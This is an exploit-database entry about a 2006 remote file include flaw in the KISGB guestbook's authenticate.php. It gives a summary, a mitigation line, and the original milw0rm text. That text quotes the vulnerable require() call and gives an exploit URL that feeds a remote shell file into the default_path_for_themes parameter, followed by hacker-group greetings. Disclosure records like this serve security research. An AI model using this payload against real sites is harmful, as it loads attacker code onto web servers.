KISGB (Keep It Simple Guest Book) [default_path_for_themes] Remote File Include

vendor:

KISGB (Keep It Simple Guest Book)

by:

mdx

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: KISGB (Keep It Simple Guest Book)

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

KISGB (Keep It Simple Guest Book) [default_path_for_themes] Remote File Include

A remote file include vulnerability exists in KISGB (Keep It Simple Guest Book) [default_path_for_themes] due to insufficient sanitization of user-supplied input. An attacker can exploit this vulnerability to include a remote file containing malicious code and execute it in the context of the web server process. The vulnerable code is located in the authenticate.php file, where the variable $default_path_for_themes is not properly sanitized before being used in a require() call. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing an arbitrary remote file URL in the default_path_for_themes parameter.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized before being used in a require() call.

Source

Exploit-DB raw data:

******************************************************************************************************
*KISGB (Keep It Simple Guest Book)* [default_path_for_themes] ******************* Remote File Include*
******************************************************************************************************
*******************************************
+class : Remote File Include Vulnerability*
+******************************************************************************************************************
+download link : http://phpnuke-downloads.com/modules.php?name=Downloads&d_op=ns_getit&cid=14&lid=156&type=url#get*
*******************************************************************************************************************
+Author : mdx
*
*****************************************************************************
+Files :								    *
+authenticate.php?                                                          *
**********************************************************************************
+code  :                                                                         *
+                                                                                *
+if (isset($default_path_for_themes)) require("$default_path_for_themes/$theme");*
+                                                                                *
*********************************************************************************************
+ Exploit  :                                                                                *
+********************************************************************************************+
+ http://www.site.***/[path]/authenticate.php?default_path_for_themes=http://mdxshell.txt?   +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
==============================================================================================
?                  Hi , The_bat_hacker , How are you ? ;=)                                   *
?                                                                                            *
? Thanks ; Cyber-WARRIOR TIM USERS, xoron , prohack ,leak , ozii , sakkure , abbad, dreamlord*
?                                                                                            *
?/////////////////////////////////////////////////////////////////////////////////////////////
?---------------------specials thanks  stroke ,SHiKaA----------------------------------------*
**********************************************************************************************
*******************                                                                          *
*******************                   KORKULARINIZ SADECE KABUSLARINIZDIR..		     *
*******************                                                                          *
*******************                        Turkish Hacker by mdx                             *
*******************                                                                          *
*******************                        Korkmak Kurtulmak Degildir.			     *
*******************                                                                          *
**********************************************************************************************


//////////////////////////////////////////////////////////////////////////////////////////////


Notes:

$sapi_name = strtolower(php_sapi_name());
if (strpos($sapi_name,"cgi")===FALSE) {
}
else {
	Vulnerable here.
	
So this is only vulnerable for CGI PHP versions.

/str0ke

# milw0rm.com [2006-12-22]